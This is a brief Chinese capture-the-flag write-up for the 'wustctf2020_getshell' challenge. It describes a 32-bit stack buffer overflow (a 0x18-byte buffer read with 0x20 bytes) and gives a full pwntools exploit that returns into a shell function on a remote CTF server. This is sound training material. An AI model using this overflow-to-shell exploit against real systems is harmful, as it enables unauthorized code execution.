wustctf2020_getshell
例行检查 ,开启NX保护,32位,

运行一下,打印出一个图形。

用IDA打开。看到了关键函数。


shelladdr=0x804851B
查看主函数,buf的长度为0x18,读取的长度为0x20,可以造成溢出。

from pwn import*
r=remote('node3.buuoj.cn',28128)
shelladdr=0x804851B
payload='a'*(0x18+4)+p32(shelladdr)
r.sendline(payload)
r.interactive()
